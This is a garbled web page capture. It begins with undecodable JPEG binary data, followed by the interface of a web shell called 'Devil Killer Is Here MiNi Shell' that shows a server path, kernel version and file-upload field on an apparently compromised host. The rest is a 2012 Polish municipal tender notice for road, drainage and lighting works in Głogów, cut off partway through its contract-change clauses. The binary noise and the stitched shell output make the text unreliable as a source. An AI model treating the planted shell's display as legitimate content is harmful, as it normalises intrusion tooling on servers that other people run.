JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120322/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120322/66777-N-2012.html

<p class="kh_header"><b>Głogów: Budowa dróg, chodników, miejsc postojowych dla potrzeb budynku TBS Nr 13 w Głogowie w ramach realizacji zadania pn.: Infrastruktura na osiedlu Piastów Śląskich: ul. Książąt Oleśnickich  cd., Henryka V Żelaznego, ul. Kazimierza Sprawiedliwego + ul. Kazimierza Wielkiego w Głogowie</b><br>
<b>Numer ogłoszenia: 66777 - 2012; data zamieszczenia: 22.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.sbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa dróg, chodników, miejsc postojowych dla potrzeb budynku TBS Nr 13 w Głogowie w ramach realizacji zadania pn.: Infrastruktura na osiedlu Piastów Śląskich: ul. Książąt Oleśnickich  cd., Henryka V Żelaznego, ul. Kazimierza Sprawiedliwego + ul. Kazimierza Wielkiego w Głogowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  budowa dróg, chodników, miejsc postojowych dla potrzeb budynku TBS Nr 13 w Głogowie w ramach realizacji zadania pn. Infrastruktura na osiedlu Piastów Śląskich: ul. Książąt Oleśnickich  cd., Henryka V Żelaznego, ul. Kazimierza Sprawiedliwego + ul. Kazimierza Wielkiego w Głogowie

1. Zakres prac branży  drogowej :
I.	Roboty przygotowawcze:
- roboty pomiarowe    0,097km
- cięcie nawierzchni bitumicznej  piłą mechaniczną
II.	Roboty ziemne:
-	wykopy mechaniczne grunt IV kat. z transportem  na odl.  8 km na odkład
-	wykopy mechaniczne grunt III- IV kat. z transportem na odl. 10 km 
-	wykopy ręczne w gruncie III-IV kat.  z transportem na odl. 10km
-	wykopy mechaniczne w gruncie I-II kat. (dokop) z transportem na odl.10 km
-	plantowanie poboczy i skarp nasypów
-	formowanie i zagęszczanie nasypu- grunt kat. I- II
III.	Odwodnienie i urządzenia obce
-	ułożenie rur osłonowych PCV f160
-	regulacja pionowa studzienek kanalizacji sanitarnej i deszczowej 
-	regulacja pionowa zaworów wody lub gazu
IV.	Podbudowy
-	profilowanie i zagęszczanie podłoża w wykopie 
-	oczyszczenie warstw konstrukcyjnych
-	skropienie warstw konstrukcyjnych
-	podbudowa z kruszywa łamanego 0 63 mm grub.15 cm
-	podbudowa z kruszywa łamanego 0 31,5 mm grub.15 cm
-	podbudowa z kruszywa łamanego 0 63 mm grub.23 cm
-	podbudowa z tłucznia kamiennego grub. 15 cm
-	podbudowa pomocnicza z tłucznia kamiennego grub. 20 cm
-	podbudowa z gruntu stabilizowanego  cementem grub. 15 cm  o Rm=2,5 Mpa
-	podbudowa z gruntu stabilizowanego  cementem grub. 10 cm  o Rm=1,5 Mpa
-	podbudowa zasadnicza z betonu asfaltowego o grub. 7 cm
V.	Nawierzchnie
-	warstwa ścieralna z betonu asfaltowego o grub. 5 cm
-	frezowanie nawierzchni bitumicznej z wywozem i utylizacją
-	nawierzchnia z betonowej kostki brukowej szarej 8 cm na podsypce z miału kamiennego ( zmiana w stosunku do przedmiaru)
-	nawierzchnia z betonowej kostki brukowej miejsc postojowych o grub. 8 cm (kolor szary) strona lewa z pasami w kolorze czerwonym na podsypce z miału kamiennego (zmiana w stosunku do przedmiaru)
-	nawierzchnia z kostki betonowej brukowej kolorowej (kolor zgodnie z dokumentacją) grub. 8 cm na podsypce z miału kamiennego ( zmiana w stosunku do przedmiaru)- chodnik strona prawa i chodnik  przy ul.   Książąt Oleśnickich 
-	nawierzchnia miejsc postojowych- strona prawa z betonowej kostki brukowej kolorowej (kolor zgodnie z dokumentacją) grub. 8 cm z pasami o odmiennym kolorze, na podsypce z miału kamiennego (zmiana w stosunku do przedmiaru)
-	nawierzchnia zjazdu- strona prawa, z betonowej kostki brukowej kolorowej               ( kolor zgodnie z dokumentacją) grub. 8 cm z pasami o odmiennym kolorze, na podsypce z miału kamiennego ( zmiana w stosunku do przedmiaru)
VI.	Roboty wykończeniowe
-	humusowanie pasów zieleni z obsianiem trawą przy grub. 10 cm z dowozem ziemi
VII.	Urządzenia bezpieczeństwa ruchu
-	oznakowanie poziome cienkowarstwowe
-	oznakowanie pionowe z ustawieniem słupków tarcz znaków i tabliczek
VIII.	Elementy ulic
-	ułożenie krawężnika betonowego 15x30 na ławie betonowej z oporem
-	ułożenie krawężnika betonowego  15x22 na ławie betonowej z oporem
-	ułożenie krawężnika betonowego  15x22 30 na łąwie betonowej z oporem
-	ułożenie betonowych obrzeży chodnikowych 30x8 cm na podsypce piaskowej
IX.	zieleń drogowa
- nasadzenie drzew ozdobnych wzdłuż chodnika przy budynku TBS


2. Zakres robót branży sanitarnej:

I.	Budowa odcinka D7-D8 sieci kanalizacyjnej deszczowej w ciągu ulicy Książąt Żagańskich na osiedlu Piastów Śląskich
-	Wykopy pod rurociągi
-	Podsypka pod rurociągi 
-	Montaż kanałów z rur PCV łączonych na wcisk o średnicy zew. 400mm  litych SN8 
-	Montaż przykanalików z rur PCV łączonych na wcisk o średnicy zew. 160mm 
-	Podłączenie przykanalików deszczowych za pomocą trójnika PVC Dn=200 200 45 i kolan PVC Dn=200 45
-	Montaż studni rewizyjnych z kręgów betonowych o śr. 1000mm w gotowym wykopie z dnem prefabrykowanym, bez zwężki i z włazem kanalizacyjnym typu C250 z wbudowanymi przejściami szczelnymi
-	Zabudowa studni na wybudowanym kanale Dn=400
-	Montaż wpustu ulicznego ściekowego jezdniowego Dn500 z pierścieniem odciążającym bez kołnierza od strony krawężnika z uchylną kratą na zawiasach klasy D400 z koszem osadnikowym
-	Obsypka  rurociągów
-	Zasypanie wykopów
II.	Budowa odcinka Di1-D3 sieci kanalizacyjnej deszczowej w ciągu ulicy Henryka V Żelaznego na osiedlu Piastów Śląskich   
-	Wykopy pod rurociągi
-	Podsypka pod rurociągi 
-	Montaż kanałów z rur PCV łączonych na wcisk o średnicy zew. 400mm  litych SN8
-	Montaż kanałów z rur PCV łączonych na wcisk o średnicy zew. 315mm  litych SN8
-	Montaż przykanalików z rur PCV łączonych na wcisk o średnicy zew. 200mm 
-	Podłączenie przykanalików deszczowych za pomocą trójnika PVC Dn=200 200 45 i kolan PVC Dn=200  45
-	Włączenie kanału deszczowego Dn400 do istniejącej studni Di2 na istniejącym kanale poprzez wykucie przejścia murowego szczelnego Dn=400
-	Zaślepienie kanału deszczowego Dn=315 włączonego do studni Di1 korkiem kanalizacyjnym
-	Montaż studni rewizyjnych z kręgów betonowych o śr. 1000mm w gotowym wykopie z dnem prefabrykowanym, bez zwężki i z włazem kanalizacyjnym typu C250 z wbudowanymi przejściami szczelnymi
-	Montaż wpustu ulicznego ściekowego jezdniowego Dn500 z pierścieniem odciążającym bez kołnierza od strony krawężnika z uchylną kratą na zawiasach klasy D400 z koszem osadnikowym
-	Obsypka  rurociągów
-	Zasypanie wykopów

3. Zakres robót branży elektrycznej
-	montaż słupów oświetlenia drogowego                                                         - 5 szt.
-	montaż fundamentów prefabrykowanych                                                      - 5 szt.
-	Montaż opraw SL 100 ( z wysięgnikami)                                                      - 5 szt.
-	Montaż ochrony przeciwporażeniowej                                                          - 2 kpl.

 Uwaga:
Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja techniczna wraz ze specyfikacją techniczną wykonania i odbioru robót, przedmiar robót -  stanowiące załączniki do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówienia jest  budowa dróg, chodników, miejsc postojowych dla potrzeb budynku TBS Nr 13 w Głogowie w ramach realizacji zadania pn.: Infrastruktura na osiedlu Piastów Śląskich: ul. Książąt Oleśnickich  cd., Henryka V Żelaznego, ul. Kazimierza Sprawiedliwego + ul. Kazimierza Wielkiego w Głogowie. Zamawiający przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych ( Dz. U. z 2010r., Nr 113, poz. 759 ze zm. ).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium Zamawiający ustalił w kwocie:  9.000,00zł
   słownie: dziewięć tysięcy złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikają informacje potwierdzające spełnianie warunków. 
Ocena będzie dokonywana na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą i udokumentują (referencjami, opiniami lub listami polecającymi, protokołami odbioru końcowego), iż w okresie ostatnich 5 lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy                             i doświadczenia, przez co należy rozumieć wykonanie co najmniej jednej roboty polegającej na budowie/przebudowie drogi o nawierzchni z betonu asfaltowego o powierzchni nie mniejszej niż 500 m2 wraz z kanalizacją deszczową i oświetleniem. 
Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikają informacje potwierdzające spełnianie warunków. 
Ocena będzie dokonywana na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	kierowania robotami budowlanymi w specjalności drogowej w zakresie niezbędnym do wykonania zamówienia,
-	kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci                    i urządzeń elektrycznych w zakresie niezbędnym do wykonania zamówienia, 
-	kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci                   kanalizacyjnych w zakresie niezbędnym do wykonania zamówienia,
Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikają informacje potwierdzające spełnianie warunków. 
Ocena będzie dokonywana na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)dla zabezpieczenia bieżącego wykonywania robót posiadają środki własne lub dostęp do kredytu w wysokości minimum 300.000,00 zł, 
            b) posiadają ubezpieczenie OC z tytułu prowadzonej działalności gospodarczej

Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikają informacje potwierdzające spełnianie warunków. 
Ocena będzie dokonywana na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>) Wypełniony  załącznik nr 1 - formularz OFERTA.  
2) Pełnomocnictwo podmiotów występujących wspólnie.
3) Pełnomocnictwo dla osoby podpisującej ofertę i oświadczenia - jeśli uprawnienie tej osoby nie wynika z innych dokumentów dołączonych do oferty.
4)    Kosztorys ofertowy opracowany metodą szczegółową. Suma wartości kosztorysów winna stanowić cenę brutto za wykonanie zamówienia. 
5) Kopia dowodu wniesienia wadium. 
6)Wykaz części zamówienia, które wykonawca zamierza zlecić do wykonania podwykonawcom.
7) Zobowiązania innych podmiotów
8) W przypadku, gdy osobą uprawnioną do składania ofert w imieniu Wykonawcy w trakcie aukcji elektronicznej będzie inna osoba niż  podpisująca ofertę, należy załączyć do oferty pełnomocnictwo dla tej osoby, podpisane przez osobę uprawniona do reprezentowania Wykonawcy, z którego wynikać będzie prawo do reprezentowania Wykonawcy w aukcji elektronicznej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: https://aukcjemp.marketplanet.pl/servlet/HomeServlet</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>8.	Zmiany umowy:
8.1.Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego specjalistę.
8.2.Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów  w następujących przypadkach:
a)	śmierci, choroby lub zdarzeń losowych kluczowego specjalisty,
b)	nie wywiązywania się kluczowego specjalisty z obowiązków wynikających                  z umowy.
8.3.Jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji itp.),
8.4.Zamawiający może zażądać od wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że kluczowy  specjalista nie wykonuje swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić  kluczowego specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego. W przypadku zmiany kluczowego specjalisty  nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
8.5.Zmiana terminu wykonania przedmiotu umowy może nastąpić o czas opóźnienia Zamawiającego w wykonywaniu jego obowiązków wynikających z umowy, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w wykonaniu następujących zobowiązań:
a)przekazania terenu budowy,
b)przekazania dokumentacji budowy (pozwolenia na budowę, dokumentacji projektowej, specyfikacji technicznych,  innych wymaganych przepisami, do których Zamawiający był zobowiązany),
c)	przekazania dokumentów zamiennych budowy lub usunięcia wad w dostarczanej Dokumentacji Projektowej,
d)	zmiany terminu dokonania prób końcowych i wniosków o dokonanie prób dodatkowych nieobjętych umową,
